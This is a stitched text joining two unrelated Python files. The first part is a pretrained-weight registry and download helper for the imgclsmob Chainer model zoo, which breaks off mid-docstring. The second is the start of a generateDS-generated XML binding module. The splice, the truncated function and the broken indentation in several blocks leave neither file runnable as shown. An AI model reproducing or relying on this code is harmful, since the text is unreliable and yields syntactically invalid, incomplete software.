('resnext272_2x32d_cifar100', '1834', 'bbc0c87cad70745f2aa86241521449ab7f9fd3bf', 'v0.0.375'),
('resnext272_2x32d_svhn', '0244', 'd9432f639120985968afc9b1bdde666ceaad53c9', 'v0.0.375'),
('seresnet20_cifar10', '0601', '143eba2ad59cc9f7e539d97445eb4fe13aad1a6e', 'v0.0.362'),
('seresnet20_cifar100', '2854', '1240e42f79500ddca2e471f543ff1aa28f20af16', 'v0.0.362'),
('seresnet20_svhn', '0323', '6c611f0a860d7a0c161602bfc268ccb8563376ee', 'v0.0.362'),
('seresnet56_cifar10', '0413', '66486cdbab43e244883ca8f26aa93da2297f9468', 'v0.0.362'),
('seresnet56_cifar100', '2294', 'ab7e54434bdee090f0694d3ba96122c441b7753b', 'v0.0.362'),
('seresnet56_svhn', '0264', '0a017d76364bb219b35aa2a792291acb1554e251', 'v0.0.362'),
('seresnet110_cifar10', '0363', '9a85ff9521387e1155437e691d5ccb411b28e441', 'v0.0.362'),
('seresnet110_cifar100', '2086', '298d298ea6747ff9f9277be08838f723c239e4e3', 'v0.0.362'),
('seresnet110_svhn', '0235', '525399af7c6f717aabc6c1c024c863191a1a28d9', 'v0.0.362'),
('seresnet164bn_cifar10', '0339', '4c59e76fc3264532142b37db049d3ff422b6d5f4', 'v0.0.362'),
('seresnet164bn_cifar100', '1995', 'cdac82fd3133bfd4d8cd261016a68fe95928ea4b', 'v0.0.362'),
('seresnet164bn_svhn', '0245', '31e8d2beeeb74a444ff756cafc7f1b557009cddc', 'v0.0.362'),
('seresnet272bn_cifar10', '0339', '8081d1be9a5eb985c828b6f60e41b3d689c84659', 'v0.0.390'),
('seresnet272bn_cifar100', '1907', 'a83ac8d69535cfb394be7e790ff9683d65e2b3f9', 'v0.0.390'),
('seresnet272bn_svhn', '0238', '2b28cd779296d2afbb789cee7b73a80b4b07e4a9', 'v0.0.390'),
('seresnet542bn_cifar10', '0347', 'e67d0c059a4f5c2e97790eb50d03013430f5a2fd', 'v0.0.385'),
('seresnet542bn_cifar100', '1887', 'dac530d68dff49ec37756212d3f9b52c256448fb', 'v0.0.385'),
('seresnet542bn_svhn', '0226', '9571b88bd6ac07407a453651feb29b376609933c', 'v0.0.385'),
('sepreresnet20_cifar10', '0618', 'cbc1c4df6061046a7cf99e5739a5c5df811da420', 'v0.0.379'),
('sepreresnet20_cifar100', '2831', 'e54804186c83656f8d9705ff021fd83772a0c6eb', 'v0.0.379'),
('sepreresnet20_svhn', '0324', '04dafec1e0490ecc7001a0ca9547b60ba6314956', 'v0.0.379'),
('sepreresnet56_cifar10', '0451', '0b34942c73cd2d196aa01763fb5167cb78f2b56d', 'v0.0.379'),
('sepreresnet56_cifar100', '2305', '1138b50001119765d50eeaf10a3fca15ccf6040a', 'v0.0.379'),
('sepreresnet56_svhn', '0271', '150740af292a0c5c8a6d499dfa13b2a2c5672e60', 'v0.0.379'),
('sepreresnet110_cifar10', '0454', '4c062f46d2ec615cbfc0e07af12febcddcd16364', 'v0.0.379'),
('sepreresnet110_cifar100', '2261', 'b525d8b1568e1cad021026930f5b5283bdba8b49', 'v0.0.379'),
('sepreresnet110_svhn', '0259', 'eec4c9f3c94cad32557f0a969a8ec1d127877ab6', 'v0.0.379'),
('sepreresnet164bn_cifar10', '0373', 'e82ad7ffc78c00ad128ab4116dbd3f3eae028c19', 'v0.0.379'),
('sepreresnet164bn_cifar100', '2005', 'baf00211c3da54ddf50000629b8419da8af599d8', 'v0.0.379'),
('sepreresnet164bn_svhn', '0256', '36362d66943c89b7b7153eeaf0cfc2113369b6d5', 'v0.0.379'),
('sepreresnet272bn_cifar10', '0339', '02e141138736d647bcbdb4f0fc0d81a7bc8bef85', 'v0.0.379'),
('sepreresnet272bn_cifar100', '1913', 'd37b7af28056f42bbd11df19479cbdb0b0ac7f63', 'v0.0.379'),
('sepreresnet272bn_svhn', '0249', '44b18f81ea4ba5ec6a7ea725fc9c0798a670c161', 'v0.0.379'),
('sepreresnet542bn_cifar10', '0308', '1e726874123afc10d24cf58779347b13fdfa3b00', 'v0.0.382'),
('sepreresnet542bn_cifar100', '1945', 'aadac5fbe15f5227ff02cdf9abf3c2f27b602db4', 'v0.0.382'),
('sepreresnet542bn_svhn', '0247', 'ff5682df9a051821a4fda0a1f1fe81dbf96da479', 'v0.0.382'),
('pyramidnet110_a48_cifar10', '0372', '965fce37e26ef4e3724df869fe90283669fe9daf', 'v0.0.184'),
('pyramidnet110_a48_cifar100', '2095', 'b74f12c8d11de3ddd9fa51fe93c1903675a43a3c', 'v0.0.186'),
('pyramidnet110_a48_svhn', '0247', 'e750bd672b24bb60eca0527fd11f9866a9fc8329', 'v0.0.281'),
('pyramidnet110_a84_cifar10', '0298', '7b38a0f65de0bec2f4ceb83398fef61009a2c129', 'v0.0.185'),
('pyramidnet110_a84_cifar100', '1887', '842b3809619ec81c6e27defcad9df5c3dbc0ae55', 'v0.0.199'),
('pyramidnet110_a84_svhn', '0243', '56b06d8fd9ec043ccf5acc0b8a129bee2ef9a901', 'v0.0.392'),
('pyramidnet110_a270_cifar10', '0251', 'b3456ddd5919ef861ec607f8287bd071de0ba077', 'v0.0.194'),
('pyramidnet110_a270_cifar100', '1710', '56ae71355de25daafe34c51b91fe5b4bdab1f6ac', 'v0.0.319'),
('pyramidnet110_a270_svhn', '0238', 'fdf9f2da74bae9d4280f329554a12c9770fde52f', 'v0.0.393'),
('pyramidnet164_a270_bn_cifar10', '0242', '783e21b5856a46ee0087535776703eb7ca0c24ae', 'v0.0.264'),
('pyramidnet164_a270_bn_cifar100', '1670', '7614c56c52d9a6ca42d0446ab7b5c9a5e4eae63f', 'v0.0.312'),
('pyramidnet164_a270_bn_svhn', '0233', '6dcd188245b4c4edc8a1c751cd54211d26e2c603', 'v0.0.396'),
('pyramidnet200_a240_bn_cifar10', '0244', '89ae1856e23a67aac329df11775346e6bf8e00b7', 'v0.0.268'),
('pyramidnet200_a240_bn_cifar100', '1609', '0729db3729da20627c7e91bd1e9beff251f2b82c', 'v0.0.317'),
('pyramidnet200_a240_bn_svhn', '0232', 'b5876d02190e3e6a7dc7c0cd6e931e96151c34e9', 'v0.0.397'),
('pyramidnet236_a220_bn_cifar10', '0247', '6b9a29664f54d8ea82afc863670a79099e6f570a', 'v0.0.285'),
('pyramidnet236_a220_bn_cifar100', '1634', 'fd14728bc8ca8ccb205880d24d38740dad232d00', 'v0.0.312'),
('pyramidnet236_a220_bn_svhn', '0235', 'bb39a3c6f8ee25c32a40304ebf266a9521b513c4', 'v0.0.398'),
('pyramidnet272_a200_bn_cifar10', '0239', '533f8d89abe57656e1baef549dabedbc4dcefbe8', 'v0.0.284'),
('pyramidnet272_a200_bn_cifar100', '1619', '4ba0ea07d5f519878d33f7b3741f742ae12fef50', 'v0.0.312'),
('pyramidnet272_a200_bn_svhn', '0240', '2ace26878c803cc3a415d8f897bf9d3ec7f4d19c', 'v0.0.404'),
('densenet40_k12_cifar10', '0561', 'a37df881a11487fdde772254a82c20c3e45b461b', 'v0.0.193'),
('densenet40_k12_cifar100', '2490', 'd06839db7eec0331354ca31b421c6fbcd4665fd3', 'v0.0.195'),
('densenet40_k12_svhn', '0305', '8d563cdf9dcd1d4822669f6119f6e77b4e03c162', 'v0.0.278'),
('densenet40_k12_bc_cifar10', '0643', '234918e7144b95454e1417035c73391663a68401', 'v0.0.231'),
('densenet40_k12_bc_cifar100', '2841', '968e5667c29dd682a90c3f8a488e00a9efe0d29f', 'v0.0.232'),
('densenet40_k12_bc_svhn', '0320', '52bd79007dd8a8b60b9aef94a555161c9faf4b37', 'v0.0.279'),
('densenet40_k24_bc_cifar10', '0452', '3ec459af58cf2106bfcbdad090369a1f3d41ef3c', 'v0.0.220'),
('densenet40_k24_bc_cifar100', '2267', 'f744296d04d703c202b0b78cdb32e7fc40116584', 'v0.0.221'),
('densenet40_k24_bc_svhn', '0290', '268af51aaea47003c9ce128ddb76507dabb0726e', 'v0.0.280'),
('densenet40_k36_bc_cifar10', '0404', '6be4225a6d0e5fb68bdc9cda471207c0b5420395', 'v0.0.224'),
('densenet40_k36_bc_cifar100', '2050', '49b6695fe06d98cfac5d4fdbdb716edb268712c2', 'v0.0.225'),
('densenet40_k36_bc_svhn', '0260', '47ef4d80ef3f541b795a1aee645ff9e8bada6101', 'v0.0.311'),
('densenet100_k12_cifar10', '0366', '85031735e1c80d3a6254fe8649c5e9bae2d54315', 'v0.0.205'),
('densenet100_k12_cifar100', '1964', 'f04f59203ad863f466c25fa9bbfc18686d72a46a', 'v0.0.206'),
('densenet100_k12_svhn', '0260', 'c57bbabec45492bcc4a2587443b06bf400c6ea25', 'v0.0.311'),
('densenet100_k24_cifar10', '0313', '939ef3090b6219e5afabc97f03cc34365c729ada', 'v0.0.252'),
('densenet100_k24_cifar100', '1808', '47274dd8a35bfeb77e9a077275111e4a94d561e4', 'v0.0.318'),
('densenet100_k12_bc_cifar10', '0416', '160a064165eddf492970a99b5a8ca9689bf94fea', 'v0.0.189'),
('densenet100_k12_bc_cifar100', '2119', 'a37ebc2a083fbe8e7642988945d1092fb421f182', 'v0.0.208'),
('densenet190_k40_bc_cifar10', '0252', '57f2fa706376545c260f4848a1112cd03069a323', 'v0.0.286'),
('densenet250_k24_bc_cifar10', '0267', '03b268872cdedadc7196783664b4d6e72b00ecd2', 'v0.0.290'),
('densenet250_k24_bc_cifar100', '1739', '9100f02ada0459792e3305feddda602e3278833a', 'v0.0.303'),
('xdensenet40_2_k24_bc_cifar10', '0531', 'd3c448ab2c110f873579093ff9a69e735d80b4e7', 'v0.0.226'),
('xdensenet40_2_k24_bc_cifar100', '2396', '84357bb40bcd1da5cf6237ea5755a309bcf36d49', 'v0.0.227'),
('xdensenet40_2_k24_bc_svhn', '0287', '065f384765a1eaaba26d1d9224878658cbb9cb84', 'v0.0.306'),
('xdensenet40_2_k36_bc_cifar10', '0437', 'fb6d7431c005eb9965da0e1b2872c048d6b31b30', 'v0.0.233'),
('xdensenet40_2_k36_bc_cifar100', '2165', '9ac51e902167ba05f1c21ed1a9690c1fd4cad3eb', 'v0.0.234'),
('xdensenet40_2_k36_bc_svhn', '0274', 'bf7f7de9f9b9661385a47b5e241fdc0c54287a8c', 'v0.0.306'),
('wrn16_10_cifar10', '0293', '4ac60015e3b287580d11e605793b3426e8184137', 'v0.0.166'),
('wrn16_10_cifar100', '1895', 'd6e852788e29532c8a12bb39617a2e81aba2483f', 'v0.0.204'),
('wrn16_10_svhn', '0278', 'b87185c815b64a1290ecbb7a217447906c77da75', 'v0.0.271'),
('wrn28_10_cifar10', '0239', 'f8a24941ca542f78eda2d192f461b1bac0600d27', 'v0.0.166'),
('wrn28_10_cifar100', '1788', '603872998b7d9f0303769cb34c4cfd16d4e09258', 'v0.0.320'),
('wrn28_10_svhn', '0271', '59f255be865678bc0d3c7dcc9785022f30265d69', 'v0.0.276'),
('wrn40_8_cifar10', '0237', '3f56f24a07be7155fb143cc4360755d564e3761a', 'v0.0.166'),
('wrn40_8_cifar100', '1803', '794aca6066fb993f2a5511df45fca58d6bc546e7', 'v0.0.321'),
('wrn40_8_svhn', '0254', '8af6aad0c2034ed8a574f74391869a0d20def51b', 'v0.0.277'),
('wrn20_10_1bit_cifar10', '0326', '3288c59a265fc3531502b9c53e33322ff74dd33f', 'v0.0.302'),
('wrn20_10_1bit_cifar100', '1904', '1c6f1917c49134da366abfbd27c1d7ad61182882', 'v0.0.302'),
('wrn20_10_1bit_svhn', '0273', '4d7bfe0dfa88d593f691b39ca9d20eb3e78636ea', 'v0.0.302'),
('wrn20_10_32bit_cifar10', '0314', '90b3fc15d99009b35b1939baefa2e2290003968a', 'v0.0.302'),
('wrn20_10_32bit_cifar100', '1812', '346f276fe7e6b61cc93482fdb3d471064d1e1de3', 'v0.0.302'),
('wrn20_10_32bit_svhn', '0259', 'af3fddd1f68f373038eea1828e7ae15d21a03ef9', 'v0.0.302'),
('ror3_56_cifar10', '0543', '7ca1b24c4a573d53484ca92b19bad5c08e38fa8b', 'v0.0.228'),
('ror3_56_cifar100', '2549', 'a7903e5f5f80bf53c07e12ce34659e0d9af4b106', 'v0.0.229'),
('ror3_56_svhn', '0269', '113859bb3c23fde05fce740647a26dca69678a34', 'v0.0.287'),
('ror3_110_cifar10', '0435', 'bf021f253fc1cf29b30a1eb579c7c4693f963933', 'v0.0.235'),
('ror3_110_cifar100', '2364', '13de922a8f8758a15eaf1d283dc42e7dcf0f3fda', 'v0.0.236'),
('ror3_110_svhn', '0257', '4b8b6963fd73753104945853a65210de84c9fb4c', 'v0.0.287'),
('ror3_164_cifar10', '0393', '7ac7b44610acdb065f40b62e94d5ec5dbb49ee11', 'v0.0.294'),
('ror3_164_cifar100', '2234', 'd5a5321048d06f554a8c7688b743c32da830372b', 'v0.0.294'),
('ror3_164_svhn', '0273', '1d0a2f127a194ea923857c1d8ec732ae5fa87300', 'v0.0.294'),
('rir_cifar10', '0328', '9780c77d0ab1c63478531557ab1aff77c208ad0d', 'v0.0.292'),
('rir_cifar100', '1923', '4bfd2f239ecca391c116cbc02d2ef7e5e2a54028', 'v0.0.292'),
('rir_svhn', '0268', '5240bc967aa1fc1e9df2b31919178203dcaa582a', 'v0.0.292'),
('shakeshakeresnet20_2x16d_cifar10', '0515', 'e2f524b5196951f48495973a087135ca974ec327', 'v0.0.215'),
('shakeshakeresnet20_2x16d_cifar100', '2922', '84772a31f6f6bb3228276515a8d4371c25925c85', 'v0.0.247'),
('shakeshakeresnet20_2x16d_svhn', '0317', '261fd59fcb7cf375331ce0c402ad2030b283c17c', 'v0.0.295'),
('shakeshakeresnet26_2x32d_cifar10', '0317', '5422fce187dff99fa8f4678274a8dd1519e23e27', 'v0.0.217'),
('shakeshakeresnet26_2x32d_cifar100', '1880', '750a574e738cf53079b6965410e07fb3abef82fd', 'v0.0.222'),
('shakeshakeresnet26_2x32d_svhn', '0262', '844e1f6d067b830087b9456617159a77137138f7', 'v0.0.295'),
('diaresnet20_cifar10', '0622', '1c5f4c8adeb52090b5d1ee7330f02b96d4aac843', 'v0.0.340'),
('diaresnet20_cifar100', '2771', '350c5ed4fa58bf339b8b44f19044d75ee14917cf', 'v0.0.342'),
('diaresnet20_svhn', '0323', 'f37bac8b8843319d2934a79e62c0e7365addef2f', 'v0.0.342'),
('diaresnet56_cifar10', '0505', '4073bb0c53d239a40c6cf7ee634f32096b1d54dd', 'v0.0.340'),
('diaresnet56_cifar100', '2435', '22e777d2b708b1fc8eb79e593130fa660b51dd95', 'v0.0.342'),
('diaresnet56_svhn', '0268', '7ea0022b7eff7afd1bb53e81d579e23952f9ee7f', 'v0.0.342'),
('diaresnet110_cifar10', '0410', '5d0517456f3d535722d4f3fade53146ffd8e9f5f', 'v0.0.340'),
('diaresnet110_cifar100', '2211', '4c6aa3fe0a58d54ce04061df8440b798b73c9c4b', 'v0.0.342'),
('diaresnet110_svhn', '0247', '515ce8f3ddc01b00747b839e8b52387f231f482f', 'v0.0.342'),
('diaresnet164bn_cifar10', '0350', '27cfe80d62974bfc1d3aa52e1fd1d173d5067393', 'v0.0.340'),
('diaresnet164bn_cifar100', '1953', '18aa50ab105095688597937fcafdbae1d5518597', 'v0.0.342'),
('diaresnet164bn_svhn', '0244', '4773b5183a25ef906e176079f3cae8641a167e13', 'v0.0.342'),
('diapreresnet20_cifar10', '0642', 'bfcfd5c633e563036061d10d420ea6878f102ddb', 'v0.0.343'),
('diapreresnet20_cifar100', '2837', '936a4acca4a570be185c6338e0a76c8d8cee78a9', 'v0.0.343'),
('diapreresnet20_svhn', '0303', 'd682b80f3a2f5d126eac829dc3a55d800a6e3998', 'v0.0.343'),
('diapreresnet56_cifar10', '0483', 'd5229916f76180aa66a08d89645c1cdd1bbf4bf1', 'v0.0.343'),
('diapreresnet56_cifar100', '2505', '9867b907f721c3688bc9577e2d30e71aac14e163', 'v0.0.343'),
('diapreresnet56_svhn', '0280', '7a984a6375979ecce61576cc371ed5170a4b2cd2', 'v0.0.343'),
('diapreresnet110_cifar10', '0425', '9fab76b9a11b246b0e06386879b29196af002de5', 'v0.0.343'),
('diapreresnet110_cifar100', '2269', '0af00d413f9c7022ebec87256760b40ccb30e944', 'v0.0.343'),
('diapreresnet110_svhn', '0242', '2bab754f7a7d426eb5a1f40c3156e2c82aa145c2', 'v0.0.343'),
('diapreresnet164bn_cifar10', '0356', '7a0b124307fe307489743d8648e99239e14b764a', 'v0.0.343'),
('diapreresnet164bn_cifar100', '1999', 'a3835edf5ae8daa0383e8d13fedf3a8dc8352338', 'v0.0.343'),
('diapreresnet164bn_svhn', '0256', '30de9b3b60e03ab5c44bf7d9b571f63a9065890d', 'v0.0.343'),
('resnet10_cub', '2760', 'e8bdefb0f503d253197370a2d9d5ae772b2cb913', 'v0.0.335'),
('resnet12_cub', '2667', '22b2b21696461aa952a257014f4f0ec901375ac5', 'v0.0.336'),
('resnet14_cub', '2434', '57f6a73d2eb22d7dfc43a8ff52f25982e1b7d78b', 'v0.0.337'),
('resnet16_cub', '2321', '5e48b19f8fb8eae1afcdf04e77ae3ad9ad9c6b73', 'v0.0.338'),
('resnet18_cub', '2333', 'c32998b4b12e31b9d291770bbf3eb38490542e38', 'v0.0.344'),
('resnet26_cub', '2261', '56c8fcc12333fec68ac09c6696bb462e175be047', 'v0.0.345'),
('seresnet10_cub', '2742', 'b8e56acfe873705609c82932c321467169436531', 'v0.0.361'),
('seresnet12_cub', '2599', '9c0ee8cf33733bf5ba66eeda7394c84ed11d3d7e', 'v0.0.361'),
('seresnet14_cub', '2368', 'b58cddb7b2cc8f5c40a83912690eeff8d4d6d418', 'v0.0.361'),
('seresnet16_cub', '2318', '1d8b187c417832ac3f19806ff13f1897c7692f4f', 'v0.0.361'),
('seresnet18_cub', '2321', '7b1d02a7965a3f54606d768e0e5149148f2fb0b1', 'v0.0.361'),
('seresnet26_cub', '2254', '5cbf65d229088b3f16e396a05bde054470c14563', 'v0.0.361'),
('mobilenet_w1_cub', '2356', '02c2accf0f92fcc460cdbb6b41a581321e1fa216', 'v0.0.346'),
('proxylessnas_mobile_cub', '2190', 'a9c66b1b9623f81105b9daf8c5e45f4501e80bbe', 'v0.0.347'),
('ntsnet_cub', '1286', '4d7595248f0fb042ef06c657d73bd0a2f3fc4f0d', 'v0.0.334'),
('pspnet_resnetd101b_voc', '7626', 'f90c0db9892ec6892623a774ba21000f7cc3995f', 'v0.0.297'),
('pspnet_resnetd50b_ade20k', '2746', '7b7ce5680fdfab567222ced11a2430cf1a452116', 'v0.0.297'),
('pspnet_resnetd101b_ade20k', '3286', 'c5e619c41740751865f662b539abbad5dd9be42b', 'v0.0.297'),
('pspnet_resnetd101b_cityscapes', '5757', '2e2315d45b83479c507a4e7a47dac6a68a8e3e1c', 'v0.0.297'),
('pspnet_resnetd101b_coco', '5467', '690335581310128a1d11fcdb0eb03ce07fb5f88d', 'v0.0.297'),
('deeplabv3_resnetd101b_voc', '7566', '6a4f805fe1433898d1dc665bb10a5620816999bd', 'v0.0.298'),
('deeplabv3_resnetd152b_voc', '7806', '1c3089b5034043e4a82567ae28b085d694e5319c', 'v0.0.298'),
('deeplabv3_resnetd50b_ade20k', '3196', '00903dce3d63fd847c36617d51907cff12834d06', 'v0.0.298'),
('deeplabv3_resnetd101b_ade20k', '3517', '46828740498741a7291fd479901dfba3d3de3b11', 'v0.0.298'),
('deeplabv3_resnetd101b_coco', '5906', '2811b3cd3512c237faef59f746d984823892d9e5', 'v0.0.298'),
('deeplabv3_resnetd152b_coco', '6107', '80ddcd964c41906f4bc104cf5b087303a06aa79f', 'v0.0.298'),
('fcn8sd_resnetd101b_voc', '8040', '3568dc41c137cbe797c1baa7b5a76669faf1ceb0', 'v0.0.299'),
('fcn8sd_resnetd50b_ade20k', '3339', '1d03bc38ea64551806ddfd4185b5eb49fb9e160f', 'v0.0.299'),
('fcn8sd_resnetd101b_ade20k', '3588', 'ff385e1913bc8c05c6abe9cb19896f477b9b75a7', 'v0.0.299'),
('fcn8sd_resnetd101b_coco', '6011', '4a469997cdc3e52c1dee1a2d58578f9df54c419b', 'v0.0.299'),
('icnet_resnetd50b_cityscapes', '6078', '04f581dc985f3d2874e8530bb70e529302e9d3dd', 'v0.0.457'),
('fastscnn_cityscapes', '6595', '6dca42601bbba8134afa11674ba606231e30f035', 'v0.0.474'),
('sinet_cityscapes', '6084', 'c0a4e992f64c042ac815b87fe8d37919a693d0ad', 'v0.0.437'),
('bisenet_resnet18_celebamaskhq', '0000', 'c3bd2251b86e4fce29a3d1fb7600c6259d4d6523', 'v0.0.462'),
('danet_resnetd50b_cityscapes', '6799', 'dcef11be5a3e3984877c9d2b8644a630938eb25a', 'v0.0.468'),
('danet_resnetd101b_cityscapes', '6810', 'a6593e21091fb7d96989866381fe484de50a5d70', 'v0.0.468'),
('alphapose_fastseresnet101b_coco', '7415', 'c1aee8e0e4aaa1352d728ad5f147d77b9ebeff8d', 'v0.0.454'),
('simplepose_resnet18_coco', '6631', 'e267629f3da46f502914d84c10afb52a5ea12e3b', 'v0.0.455'),
('simplepose_resnet50b_coco', '7102', '78b005c871baaf5a77d7c8de41eac8ec01b7d942', 'v0.0.455'),
('simplepose_resnet101b_coco', '7244', '59f85623525928ba8601eefc81c781f0a48dd72e', 'v0.0.455'),
('simplepose_resnet152b_coco', '7253', '6228ce42852da4e01b85917f234bf74cc0962e8f', 'v0.0.455'),
('simplepose_resneta50b_coco', '7170', 'e45c65255002eb22c2aa39ff4ee4d7d1c902467c', 'v0.0.455'),
('simplepose_resneta101b_coco', '7297', '800500538da729d33bd7e141b3b7c80738b33c47', 'v0.0.455'),
('simplepose_resneta152b_coco', '7344', 'ac76d0a9dd51dcbe770ce3044567bc53f21d8fc4', 'v0.0.455'),
('simplepose_mobile_resnet18_coco', '6625', 'a5201083587dbc1f9e0b666285872f0ffcb23f88', 'v0.0.456'),
('simplepose_mobile_resnet50b_coco', '7110', '6d17c89b71fa02db4903ac4ba08922c1c267dcf5', 'v0.0.456'),
('simplepose_mobile_mobilenet_w1_coco', '6410', '14efcbbaf1be6e08448a89feb3161e572466de20', 'v0.0.456'),
('simplepose_mobile_mobilenetv2b_w1_coco', '6374', '73b90839e07f59decdbc11cbffff196ed148e1d9', 'v0.0.456'),
('simplepose_mobile_mobilenetv3_small_w1_coco', '5434', 'cc5169a3ac2cb3311d02bc4752abc0f799bc4492', 'v0.0.456'),
('simplepose_mobile_mobilenetv3_large_w1_coco', '6367', 'b93dbd09bdb07fd33732aaf9e782148cbb394cd3', 'v0.0.456'),
('lwopenpose2d_mobilenet_cmupan_coco', '3999', '0a2829dcb84ea39a401dbfb6b4635d68cc1e23ca', 'v0.0.458'),
('lwopenpose3d_mobilenet_cmupan_coco', '3999', 'ef1e8e130485a5df9864db59f93ddeb892c11a46', 'v0.0.458'),
('ibppose_coco', '6487', '70158be1fc226d4b3608d02273898e887edf744a', 'v0.0.459'),
('jasperdr10x5_en', 'nana', '9e212ca84c4ecd876462c289754ab71fa845c445', 'v0.0.555'),
('jasperdr10x5_en_nr', 'nana', 'cf4b9f5320ed72868104d0bfb44a6012be348a0b', 'v0.0.555'),
('quartznet5x5_en_ls', 'nana', '3651852c5a78ae2c9f2f58aa6936bc75db83a30a', 'v0.0.555'),
('quartznet15x5_en', 'nana', 'd41a53cf8fc87d229d7c464a034ab33347d05e8f', 'v0.0.555'),
('quartznet15x5_en_nr', 'nana', 'c73f88532c594801f76b7db921f1c7c3fcf08fc0', 'v0.0.555'),
('quartznet15x5_de', 'nana', '02b5f71ff83de19d97f6770566b0d57cc2ea1bb9', 'v0.0.555'),
('quartznet15x5_fr', 'nana', '62c42726412bd3b97a668632f78225351bf040ed', 'v0.0.555'),
('quartznet15x5_it', 'nana', '6712dfefb2f1cb997f467ffb7feb0ceb94f2a046', 'v0.0.555'),
('quartznet15x5_es', 'nana', '96f14570ed8f75d1b2ebb1e13e20dd28a128c99b', 'v0.0.555'),
('quartznet15x5_ca', 'nana', 'a8ba8cb3da5bda15a6a0d2fb30ced54459a0f0ff', 'v0.0.555'),
('quartznet15x5_pl', 'nana', 'a1ea93770043bd852a21a4e8c29c366268ce27d5', 'v0.0.555'),
('quartznet15x5_ru', 'nana', 'cb5585439804c94ef9d8d39a5bc483932fe4acd0', 'v0.0.555'),
('quartznet15x5_ru34', 'nana', 'b4dd1c93ecb01dd79276f3e13bec8d36c6249d02', 'v0.0.555'),
]}
# Base URL of the GitHub repository whose release assets host the pretrained
# weight archives referenced by `_model_sha1`.
imgclsmob_repo_url = 'https://github.com/osmr/imgclsmob'
def get_model_name_suffix_data(model_name):
    """
    Look up the registry record for a pretrained model.

    Parameters:
    ----------
    model_name : str
        Name of the model.

    Returns:
    -------
    tuple of (error, sha1_hash, repo_release_tag)
        Error string used in the weight file name, expected SHA-1 of the
        weights file, and the release tag hosting the archive.

    Raises:
    ------
    ValueError
        If no pretrained weights are registered for `model_name`.
    """
    record = _model_sha1.get(model_name)
    if record is None:
        raise ValueError("Pretrained model for {name} is not available.".format(name=model_name))
    error, sha1_hash, repo_release_tag = record
    return error, sha1_hash, repo_release_tag
def get_model_file(model_name,
                   local_model_store_dir_path=os.path.join("~", ".chainer", "models")):
    """
    Return the local path of a pretrained model file, downloading it if needed.

    The zipped weight archive is fetched from the online model zoo when the file
    is missing locally or its SHA-1 hash does not match the registered value.
    The root directory is created if it doesn't exist.

    Parameters:
    ----------
    model_name : str
        Name of the model.
    local_model_store_dir_path : str, default $CHAINER_HOME/models
        Location for keeping the model parameters.

    Returns:
    -------
    file_path
        Path to the requested pretrained model file.

    Raises:
    ------
    ValueError
        If the downloaded file still fails the SHA-1 check.
    """
    error, sha1_hash, repo_release_tag = get_model_name_suffix_data(model_name)
    file_name = "{name}-{error}-{short_sha1}.npz".format(
        name=model_name,
        error=error,
        short_sha1=sha1_hash[:8])
    local_model_store_dir_path = os.path.expanduser(local_model_store_dir_path)
    file_path = os.path.join(local_model_store_dir_path, file_name)
    if os.path.exists(file_path):
        if _check_sha1(file_path, sha1_hash):
            # Cached copy is intact - nothing to download.
            return file_path
        logging.warning("Mismatch in the content of model file detected. Downloading again.")
    else:
        logging.info("Model file not found. Downloading to {}.".format(file_path))
    if not os.path.exists(local_model_store_dir_path):
        os.makedirs(local_model_store_dir_path)
    # Release assets are zipped; download next to the target file and unpack.
    zip_file_path = file_path + ".zip"
    _download(
        url="{repo_url}/releases/download/{repo_release_tag}/{file_name}.zip".format(
            repo_url=imgclsmob_repo_url,
            repo_release_tag=repo_release_tag,
            file_name=file_name),
        path=zip_file_path,
        overwrite=True)
    with zipfile.ZipFile(zip_file_path) as zf:
        zf.extractall(local_model_store_dir_path)
    os.remove(zip_file_path)
    if not _check_sha1(file_path, sha1_hash):
        raise ValueError("Downloaded file has different hash. Please try again.")
    return file_path
def _download(url, path=None, overwrite=False, sha1_hash=None, retries=5, verify_ssl=True):
"""Download an given URL
Parameters:
----------
url : str
URL to download
path | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Dec 6 12:13:05 2018 by generateDS.py version 2.30.8.
# Python 3.6.1 (v3.6.1:69c0db5, Mar 21 2017, 18:41:36) [MSC v.1900 64 bit (AMD64)]
#
# Command line options:
# ('-o', 'webapp.py')
#
# Command line arguments:
# webapp.xsd
#
# Command line:
# C:\Users\ljaqueme\DOCUME~1\02-THR~1\05-INT~1\10-IR-~1\V_IR-T~2\Scripts\generateDS -o "webapp.py" webapp.xsd
#
# Current working directory (os.getcwd()):
# gen
#
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
# When True, generated element classes validate simple-type values while
# building/exporting (emitting warnings on violations).
Validate_simpletypes_ = True
# Python 2/3 compatibility: the base string type used for isinstance checks.
if sys.version_info.major == 2:
    BaseStrType_ = basestring
else:
    BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
    """Parse XML from a file path or file-like object and return the document tree."""
    if parser is None:
        # Prefer the lxml ElementTree-compatible parser (it ignores comments);
        # fall back to the plain XMLParser when lxml is not available.
        factory = getattr(etree_, 'ETCompatXMLParser', etree_.XMLParser)
        parser = factory()
    return etree_.parse(infile, parser=parser, **kwargs)
def parsexmlstring_(instring, parser=None, **kwargs):
    """Parse XML from a string and return the root element."""
    if parser is None:
        # Prefer the lxml ElementTree-compatible parser (it ignores comments);
        # fall back to the plain XMLParser when lxml is not available.
        factory = getattr(etree_, 'ETCompatXMLParser', etree_.XMLParser)
        parser = factory()
    return etree_.fromstring(instring, parser=parser, **kwargs)
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for a example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
    class GeneratedsSuper(object):
        # Matches a trailing numeric UTC offset such as "+05:30" or "-14:00"
        # on ISO-8601 date/time strings.
        tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
